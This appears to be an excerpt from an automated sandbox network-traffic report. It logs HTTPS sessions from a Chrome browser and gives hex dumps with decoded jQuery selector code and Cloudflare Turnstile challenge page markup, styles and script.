6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                                                    Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                                                    2025-01-15 21:50:12 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                                                    Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                                                    2025-01-15 21:50:12 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                                    Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                                                    2025-01-15 21:50:12 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                                    Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    12192.168.2.849733104.18.94.414434836C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-01-15 21:50:13 UTC795OUTGET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/bip52/0x4AAAAAAA5Dtl6jm2_BdC5F/auto/fbE/normal/auto/ HTTP/1.1
                                                                    Host: challenges.cloudflare.com
                                                                    Connection: keep-alive
                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                    sec-ch-ua-mobile: ?0
                                                                    sec-ch-ua-platform: "Windows"
                                                                    Upgrade-Insecure-Requests: 1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Sec-Fetch-Site: cross-site
                                                                    Sec-Fetch-Mode: navigate
                                                                    Sec-Fetch-Dest: iframe
                                                                    Referer: https://r.bitualicar.ru/
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2025-01-15 21:50:13 UTC1362INHTTP/1.1 200 OK
                                                                    Date: Wed, 15 Jan 2025 21:50:13 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 26635
                                                                    Connection: close
                                                                    cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                    permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                    content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                                                    cross-origin-embedder-policy: require-corp
                                                                    cross-origin-opener-policy: same-origin
                                                                    cross-origin-resource-policy: cross-origin
                                                                    origin-agent-cluster: ?1
                                                                    accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                    critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                    referrer-policy: same-origin
                                                                    document-policy: js-profiling
                                                                    2025-01-15 21:50:13 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 39 30 32 39 31 34 38 34 64 61 31 39 63 33 33 32 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                    Data Ascii: Server: cloudflareCF-RAY: 90291484da19c332-EWRalt-svc: h3=":443"; ma=86400
                                                                    2025-01-15 21:50:13 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                                    Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                                    2025-01-15 21:50:13 UTC1369INData Raw: 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65
                                                                    Data Ascii: dding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:antialiase
                                                                    2025-01-15 21:50:13 UTC1369INData Raw: 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 66 69 6c 6c 3a 23
                                                                    Data Ascii: stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;fill:#
                                                                    2025-01-15 21:50:13 UTC1369INData Raw: 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72
                                                                    Data Ascii: e-dark #challenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dar
                                                                    2025-01-15 21:50:13 UTC1369INData Raw: 32 30 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68
                                                                    Data Ascii: 20}.theme-dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-h
                                                                    2025-01-15 21:50:13 UTC1369INData Raw: 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31
                                                                    Data Ascii: ;stroke-dashoffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.animation{0%{fill:#de1303;stroke:#de1
                                                                    2025-01-15 21:50:13 UTC1369INData Raw: 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d
                                                                    Data Ascii: ay:flex;flex-flow:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-com
                                                                    2025-01-15 21:50:13 UTC1369INData Raw: 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65
                                                                    Data Ascii: i{left:255px}.rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:fle
                                                                    2025-01-15 21:50:13 UTC1369INData Raw: 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                                                    Data Ascii: olor:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    13192.168.2.849734104.18.95.414434836C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-01-15 21:50:13 UTC383OUTGET /turnstile/v0/b/e0c90b6a3ed1/api.js HTTP/1.1
                                                                    Host: challenges.cloudflare.com
                                                                    Connection: keep-alive
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    Accept: */*
                                                                    Sec-Fetch-Site: none
                                                                    Sec-Fetch-Mode: cors
                                                                    Sec-Fetch-Dest: empty
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2025-01-15 21:50:13 UTC471INHTTP/1.1 200 OK
                                                                    Date: Wed, 15 Jan 2025 21:50:13 GMT
                                                                    Content-Type: application/javascript; charset=UTF-8
                                                                    Content-Length: 47521
                                                                    Connection: close
                                                                    accept-ranges: bytes
                                                                    last-modified: Wed, 08 Jan 2025 13:42:47 GMT
                                                                    cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                    access-control-allow-origin: *
                                                                    cross-origin-resource-policy: cross-origin
                                                                    Server: cloudflare
                                                                    CF-RAY: 90291484daae18cc-EWR
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    2025-01-15 21:50:13 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                    Data Ascii: "use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                                    2025-01-15 21:50:13 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 41 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                    Data Ascii: e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                                    2025-01-15 21:50:13 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 42 74 28 65 29 7c 7c 6a 74 28 65 2c 72 29 7c 7c 7a 74 28 65 2c 72 29 7c 7c 71 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                                                    Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return Bt(e)||jt(e,r)||zt(e,r)||qt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
                                                                    2025-01-15 21:50:13 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 58 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75
                                                                    Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Xt=300020;var De=300030;var Ve=300031;var j;(fu
